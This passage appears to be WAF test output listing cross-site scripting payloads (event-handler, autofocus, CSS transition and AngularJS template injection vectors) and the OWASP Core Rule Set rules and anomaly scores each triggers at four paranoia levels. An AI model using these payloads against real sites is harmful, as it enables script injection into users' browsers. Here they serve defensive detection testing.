942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
******* payload-035-001 ***********
Payload:
payload=<style>@keyframes x{}</style><b style="animation-name:x" onanimationstart="alert(1)"></b><b style="-webkit-animation-name:x" onanimationstart="alert(1)"></b>
--- Paranoia Level 1 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 53
--- Paranoia Level 3 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
******* payload-036-001 ***********
Payload:
payload=<style>:target { color:red; }</style><x id=x style="transition:color 1s" ontransitionend=alert(1)>
--- Paranoia Level 1 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-037-001 ***********
Payload:
payload=<style>:target { color:red; }</style><x id=y style="transition:color 2s" ontransitionrun=alert(1)>
--- Paranoia Level 1 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-038-001 ***********
Payload:
payload=<style>:target { color: red; }</style><x id=x style="transition:color 10s" ontransitioncancel=alert(1)>
--- Paranoia Level 1 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941190 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
******* payload-039-001 ***********
Payload:
payload=<input autofocus onfocus=alert(1)>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
Total Incoming Score: 30
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 43
******* payload-039-002 ***********
Payload:
payload=<input onfocus=alert(1) id=x>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-040-001 ***********
Payload:
payload=<input onblur=alert(1) id=x><input autofocus><textarea onblur=alert(1) id=x></textarea><input autofocus><button onblur=alert(1) id=x></button><input autofocus><select onblur=alert(1) id=x></select><input autofocus>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
******* payload-040-002 ***********
Payload:
payload=<body onblur=alert(1)><iframe id=x></iframe><iframe id=x onblur=alert(1)></iframe><input autofocus>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
******* payload-041-001 ***********
Payload:
payload=<embed id=x onfocus=alert(1) type=text/html>
--- Paranoia Level 1 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
******* payload-041-002 ***********
Payload:
payload=<object id=x onfocus=alert(1) type=text/html>
--- Paranoia Level 1 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 43
--- Paranoia Level 4 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 56
******* payload-041-003 ***********
Payload:
payload=<video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
******* payload-041-004 ***********
Payload:
payload=<audio id=x controls onfocus=alert(1) id=x><source src="validaudio.wav"></audio>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
******* payload-043-001 ***********
Payload:
payload={{constructor.constructor('alert(1)')()}}
--- Paranoia Level 1 ---
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 5
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 18
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942510 SQLi bypass attempt by ticks or backticks detected.
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
